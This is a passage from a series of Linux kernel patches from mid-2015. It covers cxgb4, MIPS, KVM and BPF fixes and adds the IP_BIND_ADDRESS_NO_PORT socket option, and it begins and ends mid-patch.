t4_read_rss_pf_map(struct adapter *adapter) { u32 pfmap; - t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, - &pfmap, 1, TP_RSS_PF_MAP_A); + if (adapter->flags & FW_OK) + t4_fw_tp_pio_rw(adapter, &pfmap, 1, TP_RSS_PF_MAP_A, 1); + else + t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, + &pfmap, 1, TP_RSS_PF_MAP_A); return pfmap; } @@ -3761,8 +3813,11 @@ u32 t4_read_rss_pf_mask(struct adapter *adapter) { u32 pfmask; - t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, - &pfmask, 1, TP_RSS_PF_MSK_A); + if (adapter->flags & FW_OK) + t4_fw_tp_pio_rw(adapter, &pfmask, 1, TP_RSS_PF_MSK_A, 1); + else + t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, + &pfmask, 1, TP_RSS_PF_MSK_A); return pfmask; } @@ -6137,12 +6192,19 @@ int t4_init_tp_params(struct adapter *adap) /* Cache the adapter's Compressed Filter Mode and global Incress * Configuration. */ - t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, - &adap->params.tp.vlan_pri_map, 1, - TP_VLAN_PRI_MAP_A); - t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, - &adap->params.tp.ingress_config, 1, - TP_INGRESS_CONFIG_A); + if (adap->flags & FW_OK) { + t4_fw_tp_pio_rw(adap, &adap->params.tp.vlan_pri_map, 1, + TP_VLAN_PRI_MAP_A, 1); + t4_fw_tp_pio_rw(adap, &adap->params.tp.ingress_config, 1, + TP_INGRESS_CONFIG_A, 1); + } else { + t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, + &adap->params.tp.vlan_pri_map, 1, + TP_VLAN_PRI_MAP_A); + t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, + &adap->params.tp.ingress_config, 1, + TP_INGRESS_CONFIG_A); + } /* Now that we have TP_VLAN_PRI_MAP cached, we can calculate the field * shift positions of several elements of the Compressed Filter Tuple From 513d1a1d1c6be58668188e44cdadcb43061dd43c Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:36:33 +0530 Subject: [PATCH 735/872] cxgb4: Fix static checker warning The patch e85c9a7abfa4: ("cxgb4/cxgb4vf: Add code to calculate T5 BAR2 Offsets for SGE Queue Registers") from Dec 3, 2014, leads to the following static checker warning: drivers/net/ethernet/chelsio/cxgb4/t4_hw.c:5358 t4_bar2_sge_qregs() warn: should '(qid >> qpp_shift) << page_shift' be a 64 bit type? This patch fixes it Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index b4110988536d..fdda0f8c5a19 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -6053,7 +6053,7 @@ int t4_bar2_sge_qregs(struct adapter *adapter, * o The BAR2 Queue ID. * o The BAR2 Queue ID Offset into the BAR2 page. */ - bar2_page_offset = ((qid >> qpp_shift) << page_shift); + bar2_page_offset = ((u64)(qid >> qpp_shift) << page_shift); bar2_qid = qid & qpp_mask; bar2_qid_offset = bar2_qid * SGE_UDB_SIZE; From 755af33b00e99a323df534617a10aea05cba1830 Mon Sep 17 00:00:00 2001 From: Joshua Kinard Date: Tue, 2 Jun 2015 16:55:22 -0400 Subject: [PATCH 736/872] MIPS: c-r4k: Fix typo in probe_scache() Fixes a typo in arch/mips/mm/c-r4k.c's probe_scache(). Signed-off-by: Joshua Kinard Signed-off-by: Ralf Baechle --- arch/mips/mm/c-r4k.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/mm/c-r4k.c b/arch/mips/mm/c-r4k.c index 0dbb65a51ce5..2e03ab173591 100644 --- a/arch/mips/mm/c-r4k.c +++ b/arch/mips/mm/c-r4k.c @@ -1372,7 +1372,7 @@ static int probe_scache(void) scache_size = addr; c->scache.linesz = 16 << ((config & R4K_CONF_SB) >> 22); c->scache.ways = 1; - c->dcache.waybit = 0; /* does not matter */ + c->scache.waybit = 0; /* does not matter */ return 1; } From 5f35b9cd553fd64415b563497d05a563c988dbd6 Mon Sep 17 00:00:00 2001 From: James Hogan Date: Thu, 4 Jun 2015 13:25:27 +0100 Subject: [PATCH 737/872] MIPS: Fix enabling of DEBUG_STACKOVERFLOW Commit 334c86c494b9 ("MIPS: IRQ: Add stackoverflow detection") added kernel stack overflow detection, however it only enabled it conditional upon the preprocessor definition DEBUG_STACKOVERFLOW, which is never actually defined. The Kconfig option is called DEBUG_STACKOVERFLOW, which manifests to the preprocessor as CONFIG_DEBUG_STACKOVERFLOW, so switch it to using that definition instead. Fixes: 334c86c494b9 ("MIPS: IRQ: Add stackoverflow detection") Signed-off-by: James Hogan Cc: Ralf Baechle Cc: Adam Jiang Cc: linux-mips@linux-mips.org Cc: # 2.6.37+ Patchwork: http://patchwork.linux-mips.org/patch/10531/ Signed-off-by: Ralf Baechle --- arch/mips/kernel/irq.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/kernel/irq.c b/arch/mips/kernel/irq.c index 51f57d841662..3c8a18a00a65 100644 --- a/arch/mips/kernel/irq.c +++ b/arch/mips/kernel/irq.c @@ -109,7 +109,7 @@ void __init init_IRQ(void) #endif } -#ifdef DEBUG_STACKOVERFLOW +#ifdef CONFIG_DEBUG_STACKOVERFLOW static inline void check_stack_overflow(void) { unsigned long sp; From e1fb96e064e7157920f043f40ae801a5c18e57da Mon Sep 17 00:00:00 2001 From: Huacai Chen Date: Thu, 4 Jun 2015 14:53:47 +0800 Subject: [PATCH 738/872] MIPS: Loongson-3: Fix a cpu-hotplug issue in loongson3_ipi_interrupt() setup_per_cpu_areas() only setup __per_cpu_offset[] for each possible cpu, but loongson_sysconf.nr_cpus can be greater than possible cpus (due to reserved_cpus_mask). So in loongson3_ipi_interrupt(), percpu access will touch the original varible in .data..percpu section which has been freed. Without this patch, cpu-hotplug will cause memery corruption. Signed-off-by: Huacai Chen Cc: John Crispin Cc: Steven J. Hill Cc: linux-mips@linux-mips.org Cc: Fuxin Zhang Cc: Zhangjin Wu Patchwork: http://patchwork.linux-mips.org/patch/10524/ Signed-off-by: Ralf Baechle --- arch/mips/loongson/loongson-3/smp.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/loongson/loongson-3/smp.c b/arch/mips/loongson/loongson-3/smp.c index e3c68b5da18d..509877c6e9d9 100644 --- a/arch/mips/loongson/loongson-3/smp.c +++ b/arch/mips/loongson/loongson-3/smp.c @@ -272,7 +272,7 @@ void loongson3_ipi_interrupt(struct pt_regs *regs) if (action & SMP_ASK_C0COUNT) { BUG_ON(cpu != 0); c0count = read_c0_count(); - for (i = 1; i < loongson_sysconf.nr_cpus; i++) + for (i = 1; i < num_possible_cpus(); i++) per_cpu(core0_c0count, i) = c0count; } } From 8833bc308ba5d31e0a872346c0f63e9bb02dc611 Mon Sep 17 00:00:00 2001 From: Markos Chandras Date: Thu, 4 Jun 2015 11:56:13 +0100 Subject: [PATCH 739/872] MIPS: BPF: Fix stack pointer allocation Fix stack pointer offset which could potentially corrupt argument registers in the previous frame. The calculated offset reflects the size of all the registers we need to preserve so there is no need for this erroneous subtraction. [ralf@linux-mips.org: Fixed conflict due to only applying this fix part of the entire series as part of 4.1 fixes.] Signed-off-by: Markos Chandras Cc: netdev@vger.kernel.org Cc: "David S. Miller" Cc: Alexei Starovoitov Cc: Daniel Borkmann Cc: Hannes Frederic Sowa Cc: linux-kernel@vger.kernel.org Cc: linux-mips@linux-mips.org Patchwork: http://patchwork.linux-mips.org/patch/10527/ Signed-off-by: Ralf Baechle --- arch/mips/net/bpf_jit.c | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/arch/mips/net/bpf_jit.c b/arch/mips/net/bpf_jit.c index 5d6139390bf8..e23fdf2a9c80 100644 --- a/arch/mips/net/bpf_jit.c +++ b/arch/mips/net/bpf_jit.c @@ -681,11 +681,7 @@ static unsigned int get_stack_depth(struct jit_ctx *ctx) sp_off += config_enabled(CONFIG_64BIT) ? (ARGS_USED_BY_JIT + 1) * RSIZE : RSIZE; - /* - * Subtract the bytes for the last registers since we only care about - * the location on the stack pointer. - */ - return sp_off - RSIZE; + return sp_off; } static void build_prologue(struct jit_ctx *ctx) From ed9244e6c534612d2b5ae47feab2f55a0d4b4ced Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Thu, 7 May 2015 14:47:50 +0200 Subject: [PATCH 740/872] MIPS: KVM: Do not sign extend on unsigned MMIO load Fix possible unintended sign extension in unsigned MMIO loads by casting to uint16_t in the case of mmio_needed != 2. Signed-off-by: Nicholas Mc Guire Reviewed-by: James Hogan Tested-by: James Hogan Cc: Gleb Natapov Cc: Paolo Bonzini Cc: kvm@vger.kernel.org Cc: linux-mips@linux-mips.org Cc: linux-kernel@vger.kernel.org Patchwork: https://patchwork.linux-mips.org/patch/9985/ Signed-off-by: Ralf Baechle --- arch/mips/kvm/emulate.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/kvm/emulate.c b/arch/mips/kvm/emulate.c index 4b50c5787e25..d5fa3eaf39a1 100644 --- a/arch/mips/kvm/emulate.c +++ b/arch/mips/kvm/emulate.c @@ -2409,7 +2409,7 @@ enum emulation_result kvm_mips_complete_mmio_load(struct kvm_vcpu *vcpu, if (vcpu->mmio_needed == 2) *gpr = *(int16_t *) run->mmio.data; else - *gpr = *(int16_t *) run->mmio.data; + *gpr = *(uint16_t *)run->mmio.data; break; case 1: From 90c337da1524863838658078ec34241f45d8394d Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Sat, 6 Jun 2015 21:17:57 -0700 Subject: [PATCH 741/872] inet: add IP_BIND_ADDRESS_NO_PORT to overcome bind(0) limitations When an application needs to force a source IP on an active TCP socket it has to use bind(IP, port=x). As most applications do not want to deal with already used ports, x is often set to 0, meaning the kernel is in charge to find an available port. But kernel does not know yet if this socket is going to be a listener or be connected. It has very limited choices (no full knowledge of final 4-tuple for a connect()) With limited ephemeral port range (about 32K ports), it is very easy to fill the space. This patch adds a new SOL_IP socket option, asking kernel to ignore the 0 port provided by application in bind(IP, port=0) and only remember the given IP address. The port will be automatically chosen at connect() time, in a way that allows sharing a source port as long as the 4-tuples are unique. This new feature is available for both IPv4 and IPv6 (Thanks Neal) Tested: Wrote a test program and checked its behavior on IPv4 and IPv6. strace(1) shows sequences of bind(IP=127.0.0.2, port=0) followed by connect(). Also getsockname() show that the port is still 0 right after bind() but properly allocated after connect(). socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 5 setsockopt(5, SOL_IP, IP_BIND_ADDRESS_NO_PORT, [1], 4) = 0 bind(5, {sa_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.2")}, 16) = 0 getsockname(5, {sa_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.2")}, [16]) = 0 connect(5, {sa_family=AF_INET, sin_port=htons(53174), sin_addr=inet_addr("127.0.0.3")}, 16) = 0 getsockname(5, {sa_family=AF_INET, sin_port=htons(38050), sin_addr=inet_addr("127.0.0.2")}, [16]) = 0 IPv6 test : socket(PF_INET6, SOCK_STREAM, IPPROTO_IP) = 7 setsockopt(7, SOL_IP, IP_BIND_ADDRESS_NO_PORT, [1], 4) = 0 bind(7, {sa_family=AF_INET6, sin6_port=htons(0), inet_pton(AF_INET6, "::1", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, 28) = 0 getsockname(7, {sa_family=AF_INET6, sin6_port=htons(0), inet_pton(AF_INET6, "::1", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, [28]) = 0 connect(7, {sa_family=AF_INET6, sin6_port=htons(57300), inet_pton(AF_INET6, "::1", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, 28) = 0 getsockname(7, {sa_family=AF_INET6, sin6_port=htons(60964), inet_pton(AF_INET6, "::1", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, [28]) = 0 I was able to bind()/connect() a million concurrent IPv4 sockets, instead of ~32000 before patch. lpaa23:~# ulimit -n 1000010 lpaa23:~# ./bind --connect --num-flows=1000000 & 1000000 sockets lpaa23:~# grep TCP /proc/net/sockstat TCP: inuse 2000063 orphan 0 tw 47 alloc 2000157 mem 66 Check that a given source port is indeed used by many different connections : lpaa23:~# ss -t src :40000 | head -10 State Recv-Q Send-Q Local Address:Port Peer Address:Port ESTAB 0 0 127.0.0.2:40000 127.0.202.33:44983 ESTAB 0 0 127.0.0.2:40000 127.2.27.240:44983 ESTAB 0 0 127.0.0.2:40000 127.2.98.5:44983 ESTAB 0 0 127.0.0.2:40000 127.0.124.196:44983 ESTAB 0 0 127.0.0.2:40000 127.2.139.38:44983 ESTAB 0 0 127.0.0.2:40000 127.1.59.80:44983 ESTAB 0 0 127.0.0.2:40000 127.3.6.228:44983 ESTAB 0 0 127.0.0.2:40000 127.0.38.53:44983 ESTAB 0 0 127.0.0.2:40000 127.1.197.10:44983 Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- include/net/inet_sock.h | 1 + include/uapi/linux/in.h | 1 + net/ipv4/af_inet.c | 3 ++- net/ipv4/ip_sockglue.c | 7 +++++++ net/ipv6/af_inet6.c | 3 ++- 5 files changed, 13 insertions(+), 2 deletions(-) diff --git a/include/net/inet_sock.h b/include/net/inet_sock.h index b6c3737da4e9..47eb67b08abd 100644 --- a/include/net/inet_sock.h +++ b/include/net/inet_sock.h @@ -187,6 +187,7 @@ struct inet_sock { transparent:1, mc_all:1, nodefrag:1; + __u8 bind_address_no_port:1; __u8 rcv_tos; __u8 convert_csum; int uc_index; diff --git a/include/uapi/linux/in.h b/include/uapi/linux/in.h index 641338bef651..83d6236a2f08 100644 --- a/include/uapi/linux/in.h +++ b/include/uapi/linux/in.h @@ -112,6 +112,7 @@ struct in_addr { #define IP_MINTTL 21 #define IP_NODEFRAG 22 #define IP_CHECKSUM 23 +#define IP_BIND_ADDRESS_NO_PORT 24 /* IP_MTU_DISCOVER values */ #define IP_PMTUDISC_DONT 0 /* Never send DF frames */ diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c index 6ad0f7a711c9..cc858ef44451 100644 --- a/net/ipv4/af_inet.c +++ b/net/ipv4/af_inet.c @@ -488,7 +488,8 @@ int inet_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len) inet->inet_saddr = 0; /* Use device */ /* Make sure we are allowed to bind here. */ - if (sk->sk_prot->get_port(sk, snum)) { + if ((snum || !inet->bind_address_no_port) && + sk->sk_prot->get_port(sk, snum)) { inet->inet_saddr = inet->inet_rcv_saddr = 0; err = -EADDRINUSE; goto out_release_sock; diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c index 7cfb0893f263..04ae2992a5cd 100644 --- a/net/ipv4/ip_sockglue.c +++ b/net/ipv4/ip_sockglue.c @@ -582,6 +582,7 @@ static int do_ip_setsockopt(struct sock *sk, int level, case IP_TRANSPARENT: case IP_MINTTL: case IP_NODEFRAG: + case IP_BIND_ADDRESS_NO_PORT: case IP_UNICAST_IF: case IP_MULTICAST_TTL: case IP_MULTICAST_ALL: @@ -732,6 +733,9 @@ static int do_ip_setsockopt(struct sock *sk, int level, } inet->nodefrag = val ? 1 : 0; break; + case IP_BIND_ADDRESS_NO_PORT: + inet->bind_address_no_port = val ? 1 : 0; + break; case IP_MTU_DISCOVER: if (val < IP_PMTUDISC_DONT || val > IP_PMTUDISC_OMIT) goto e_inval; @@ -1324,6 +1328,9 @@ static int do_ip_getsockopt(struct sock *sk, int level, int optname, case IP_NODEFRAG: val = inet->nodefrag; break; + case IP_BIND_ADDRESS_NO_PORT: + val = inet->bind_address_no_port; + break; case IP_MTU_DISCOVER: val = inet->pmtudisc; break; diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c index f3866c0b6cfe..7de52b65173f 100644 --- a/net/ipv6/af_inet6.c +++ b/net/ipv6/af_inet6.c @@ -362,7 +362,8 @@ int inet6_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len) np->saddr = addr->sin6_addr; /* Make sure we are allowed to bind here. */ - if (sk->sk_prot->get_port(sk, snum)) { + if ((snum || !inet->bind_address_no_port) && + sk->sk_prot->get_port(sk, snum)) { inet_reset_saddr(sk); err = -EADDRINUSE; goto out; From 6d7954130c8d7100b7aba3c986fc4eefedf1a1ad Mon Sep 17 00:00:00 2001 From: Hauke Mehrtens Date: Sat, 6 Jun 2015 22:07:23 +0200 Subject: [PATCH 742/872] rhashtable: add missing import rhashtable uses EXPORT_SYMBOL_GPL() without importing linux/export.h directly it is only imported indirectly through some other includes. Signed-off-by: Hauke Mehrtens Signed-off-by: David S. Miller --- lib/rhashtable.c | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rhashtable.c b/lib/rhashtable.c index 4396434e4715..8609378e6505 100644 --- a/lib/rhashtable.c +++ b/lib/rhashtable.c @@ -26,6 +26,7 @@ #include #include #include +#include #define HASH_DEFAULT_SIZE 64UL #define HASH_MIN_SIZE 4U From c5726d26b8147030c394964aabfb5d36140c08ef Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Sat, 6 Jun 2015 10:41:17 +0200 Subject: [PATCH 743/872] wan: dscc4: fix build warning Wunused-but-set-variable Fix: drivers/net/wan/dscc4.c: In function 'dscc4_open': drivers/net/wan/dscc4.c:1049:25: warning: variable 'ppriv' set but not used [-Wunused-but-set-variable] This has been in there unused since 1da177e4c3f (Linux-2.6.12-rc2) simply remove it. Signed-off-by: Nicholas Mc Guire Signed-off-by: David S. Miller --- drivers/net/wan/dscc4.c | 3 --- 1 file changed, 3 deletions(-) diff --git a/drivers/net/wan/dscc4.c b/drivers/net/wan/dscc4.c index 08223569cebd..f76845de7aa8 100644 --- a/drivers/net/wan/dscc4.c +++ b/drivers/net/wan/dscc4.c @@ -1046,7 +1046,6 @@ static void dscc4_pci_reset(struct pci_dev *pdev, void __iomem *ioaddr) static int dscc4_open(struct net_device *dev) { struct dscc4_dev_priv *dpriv = dscc4_priv(dev); - struct dscc4_pci_priv *ppriv; int ret = -EAGAIN; if ((dscc4_loopback_check(dpriv) < 0)) @@ -1055,8 +1054,6 @@ static int dscc4_open(struct net_device *dev) if ((ret = hdlc_open(dev))) goto err; - ppriv = dpriv->pci_priv; - /* * Due to various bugs, there is no way to reliably reset a * specific port (manufacturer's dependent special PCI #RST wiring From 078b29d7e92e4254b6de16097d0369dde17efe21 Mon Sep 17 00:00:00 2001 From: "Lendacky, Thomas" Date: Fri, 5 Jun 2015 16:02:26 -0500 Subject: [PATCH 744/872] amd-xgbe: Use disable_irq_nosync from within timer function Since the Tx timer function runs in softirq context the driver needs to call disable_irq_nosync instead of a disable_irq. Reported-by: Josh Stone Signed-off-by: Tom Lendacky Signed-off-by: David S. Miller --- drivers/net/ethernet/amd/xgbe/xgbe-drv.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c index db84ddcfec84..9fd6c69a8bac 100644 --- a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c +++ b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c @@ -423,7 +423,7 @@ static void xgbe_tx_timer(unsigned long data) if (napi_schedule_prep(napi)) { /* Disable Tx and Rx interrupts */ if (pdata->per_channel_irq) - disable_irq(channel->dma_irq); + disable_irq_nosync(channel->dma_irq); else xgbe_disable_rx_tx_ints(pdata); From 908e80d6546813aaf8b546b4b4483fcec24190b6 Mon Sep 17 00:00:00 2001 From: Colin Ian King Date: Fri, 5 Jun 2015 19:19:11 +0100 Subject: [PATCH 745/872] fddi: print an address with %p format specifier rather than %x The debug is printing the struct smt_header * address using the %x format specifier. Fix it to use %p instead. Signed-off-by: Colin Ian King Signed-off-by: David S. Miller --- drivers/net/fddi/skfp/srf.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/fddi/skfp/srf.c b/drivers/net/fddi/skfp/srf.c index cc27dea3414e..9956680402de 100644 --- a/drivers/net/fddi/skfp/srf.c +++ b/drivers/net/fddi/skfp/srf.c @@ -414,7 +414,7 @@ static void smt_send_srf(struct s_smc *smc) smt->smt_len = SMT_MAX_INFO_LEN - pcon.pc_len ; mb->sm_len = smt->smt_len + sizeof(struct smt_header) ; - DB_SMT("SRF: sending SRF at %x, len %d\n",smt,mb->sm_len) ; + DB_SMT("SRF: sending SRF at %p, len %d\n",smt,mb->sm_len) ; DB_SMT("SRF: state SR%d Threshold %d\n", smc->srf.sr_state,smc->srf.SRThreshold/TICKS_PER_SECOND) ; #ifdef DEBUG From 98da81a426a76c351f3c2854d5bc31f17bba3194 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Thu, 4 Jun 2015 08:01:12 -0700 Subject: [PATCH 746/872] tcp: remove redundant checks II For same reasons than in commit 12e25e1041d0 ("tcp: remove redundant checks"), we can remove redundant checks done for timewait sockets. Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- net/ipv4/tcp_ipv4.c | 4 ---- net/ipv6/tcp_ipv6.c | 4 ---- 2 files changed, 8 deletions(-) diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c index 3130c42240c8..d7d4c2b79cf2 100644 --- a/net/ipv4/tcp_ipv4.c +++ b/net/ipv4/tcp_ipv4.c @@ -1671,10 +1671,6 @@ int tcp_v4_rcv(struct sk_buff *skb) goto discard_it; } - if (skb->len < (th->doff << 2)) { - inet_twsk_put(inet_twsk(sk)); - goto bad_packet; - } if (tcp_checksum_complete(skb)) { inet_twsk_put(inet_twsk(sk)); goto csum_error; diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c index b72e1ffc6bb4..45a7176ed460 100644 --- a/net/ipv6/tcp_ipv6.c +++ b/net/ipv6/tcp_ipv6.c @@ -1467,10 +1467,6 @@ static int tcp_v6_rcv(struct sk_buff *skb) tcp_v6_fill_cb(skb, hdr, th); - if (skb->len < (th->doff<<2)) { - inet_twsk_put(inet_twsk(sk)); - goto bad_packet; - } if (tcp_checksum_complete(skb)) { inet_twsk_put(inet_twsk(sk)); goto csum_error; From 3431205e03977aaf32bce6d4b16fb8244b510056 Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Thu, 4 Jun 2015 10:11:53 -0700 Subject: [PATCH 747/872] bpf: make programs see skb->data == L2 for ingress and egress eBPF programs attached to ingress and egress qdiscs see inconsistent skb->data. For ingress L2 header is already pulled, whereas for egress it's present. This is known to program writers which are currently forced to use BPF_LL_OFF workaround. Since programs don't change skb internal pointers it is safe to do pull/push right around invocation of the program and earlier taps and later pt->func() will not be affected. Multiple taps via packet_rcv(), tpacket_rcv() are doing the same trick around run_filter/BPF_PROG_RUN even if skb_shared. This fix finally allows programs to use optimized LD_ABS/IND instructions without BPF_LL_OFF for higher performance. tc ingress + cls_bpf + samples/bpf/tcbpf1_kern.o w/o JIT w/JIT before 20.5 23.6 Mpps after 21.8 26.6 Mpps Old programs with BPF_LL_OFF will still work as-is. We can now undo most of the earlier workaround commit: a166151cbe33 ("bpf: fix bpf helpers to use skb->mac_header relative offsets") Signed-off-by: Alexei Starovoitov Acked-by: Jamal Hadi Salim Signed-off-by: David S. Miller --- net/core/filter.c | 26 +++----------------------- net/sched/act_bpf.c | 9 ++++++++- net/sched/cls_bpf.c | 16 +++++++++++++++- samples/bpf/tcbpf1_kern.c | 8 ++++---- 4 files changed, 30 insertions(+), 29 deletions(-) diff --git a/net/core/filter.c b/net/core/filter.c index 09b2062eb5b8..36a69e33d76b 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -1238,21 +1238,6 @@ int sk_attach_bpf(u32 ufd, struct sock *sk) return 0; } -/** - * bpf_skb_clone_not_writable - is the header of a clone not writable - * @skb: buffer to check - * @len: length up to which to write, can be negative - * - * Returns true if modifying the header part of the cloned buffer - * does require the data to be copied. I.e. this version works with - * negative lengths needed for eBPF case! - */ -static bool bpf_skb_clone_unwritable(const struct sk_buff *skb, int len) -{ - return skb_header_cloned(skb) || - (int) skb_headroom(skb) + len > skb->hdr_len; -} - #define BPF_RECOMPUTE_CSUM(flags) ((flags) & 1) static u64 bpf_skb_store_bytes(u64 r1, u64 r2, u64 r3, u64 r4, u64 flags) @@ -1275,9 +1260,8 @@ static u64 bpf_skb_store_bytes(u64 r1, u64 r2, u64 r3, u64 r4, u64 flags) if (unlikely((u32) offset > 0xffff || len > sizeof(buf))) return -EFAULT; - offset -= skb->data - skb_mac_header(skb); if (unlikely(skb_cloned(skb) && - bpf_skb_clone_unwritable(skb, offset + len))) + !skb_clone_writable(skb, offset + len))) return -EFAULT; ptr = skb_header_pointer(skb, offset, len, buf); @@ -1321,9 +1305,8 @@ static u64 bpf_l3_csum_replace(u64 r1, u64 r2, u64 from, u64 to, u64 flags) if (unlikely((u32) offset > 0xffff)) return -EFAULT; - offset -= skb->data - skb_mac_header(skb); if (unlikely(skb_cloned(skb) && - bpf_skb_clone_unwritable(skb, offset + sizeof(sum)))) + !skb_clone_writable(skb, offset + sizeof(sum)))) return -EFAULT; ptr = skb_header_pointer(skb, offset, sizeof(sum), &sum); @@ -1369,9 +1352,8 @@ static u64 bpf_l4_csum_replace(u64 r1, u64 r2, u64 from, u64 to, u64 flags) if (unlikely((u32) offset > 0xffff)) return -EFAULT; - offset -= skb->data - skb_mac_header(skb); if (unlikely(skb_cloned(skb) && - bpf_skb_clone_unwritable(skb, offset + sizeof(sum)))) + !skb_clone_writable(skb, offset + sizeof(sum)))) return -EFAULT; ptr = skb_header_pointer(skb, offset, sizeof(sum), &sum); @@ -1425,8 +1407,6 @@ static u64 bpf_clone_redirect(u64 r1, u64 ifindex, u64 flags, u64 r4, u64 r5) if (unlikely(!skb2)) return -ENOMEM; - skb_push(skb2, skb2->data - skb_mac_header(skb2)); - if (BPF_IS_REDIRECT_INGRESS(flags)) return dev_forward_skb(dev, skb2); diff --git a/net/sched/act_bpf.c b/net/sched/act_bpf.c index dc6a2d324bd8..1d56903fd4c7 100644 --- a/net/sched/act_bpf.c +++ b/net/sched/act_bpf.c @@ -37,6 +37,7 @@ static int tcf_bpf(struct sk_buff *skb, const struct tc_action *act, { struct tcf_bpf *prog = act->priv; int action, filter_res; + bool at_ingress = G_TC_AT(skb->tc_verd) & AT_INGRESS; if (unlikely(!skb_mac_header_was_set(skb))) return TC_ACT_UNSPEC; @@ -48,7 +49,13 @@ static int tcf_bpf(struct sk_buff *skb, const struct tc_action *act, /* Needed here for accessing maps. */ rcu_read_lock(); - filter_res = BPF_PROG_RUN(prog->filter, skb); + if (at_ingress) { + __skb_push(skb, skb->mac_len); + filter_res = BPF_PROG_RUN(prog->filter, skb); + __skb_pull(skb, skb->mac_len); + } else { + filter_res = BPF_PROG_RUN(prog->filter, skb); + } rcu_read_unlock(); /* A BPF program may overwrite the default action opcode. diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c index 91bd9c19471d..c79ecfd36e0f 100644 --- a/net/sched/cls_bpf.c +++ b/net/sched/cls_bpf.c @@ -64,6 +64,11 @@ static int cls_bpf_classify(struct sk_buff *skb, const struct tcf_proto *tp, { struct cls_bpf_head *head = rcu_dereference_bh(tp->root); struct cls_bpf_prog *prog; +#ifdef CONFIG_NET_CLS_ACT + bool at_ingress = G_TC_AT(skb->tc_verd) & AT_INGRESS; +#else + bool at_ingress = false; +#endif int ret = -1; if (unlikely(!skb_mac_header_was_set(skb))) @@ -72,7 +77,16 @@ static int cls_bpf_classify(struct sk_buff *skb, const struct tcf_proto *tp, /* Needed here for accessing maps. */ rcu_read_lock(); list_for_each_entry_rcu(prog, &head->plist, link) { - int filter_res = BPF_PROG_RUN(prog->filter, skb); + int filter_res; + + if (at_ingress) { + /* It is safe to push/pull even if skb_shared() */ + __skb_push(skb, skb->mac_len); + filter_res = BPF_PROG_RUN(prog->filter, skb); + __skb_pull(skb, skb->mac_len); + } else { + filter_res = BPF_PROG_RUN(prog->filter, skb); + } if (filter_res == 0) continue; diff --git a/samples/bpf/tcbpf1_kern.c b/samples/bpf/tcbpf1_kern.c index 7c27710f8296..9bfb2eb34563 100644 --- a/samples/bpf/tcbpf1_kern.c +++ b/samples/bpf/tcbpf1_kern.c @@ -21,7 +21,7 @@ static inline void set_dst_mac(struct __sk_buff *skb, char *mac) static inline void set_ip_tos(struct __sk_buff *skb, __u8 new_tos) { - __u8 old_tos = load_byte(skb, BPF_LL_OFF + TOS_OFF); + __u8 old_tos = load_byte(skb, TOS_OFF); bpf_l3_csum_replace(skb, IP_CSUM_OFF, htons(old_tos), htons(new_tos), 2); bpf_skb_store_bytes(skb, TOS_OFF, &new_tos, sizeof(new_tos), 0); @@ -34,7 +34,7 @@ static inline void set_ip_tos(struct __sk_buff *skb, __u8 new_tos) static inline void set_tcp_ip_src(struct __sk_buff *skb, __u32 new_ip) { - __u32 old_ip = _htonl(load_word(skb, BPF_LL_OFF + IP_SRC_OFF)); + __u32 old_ip = _htonl(load_word(skb, IP_SRC_OFF)); bpf_l4_csum_replace(skb, TCP_CSUM_OFF, old_ip, new_ip, 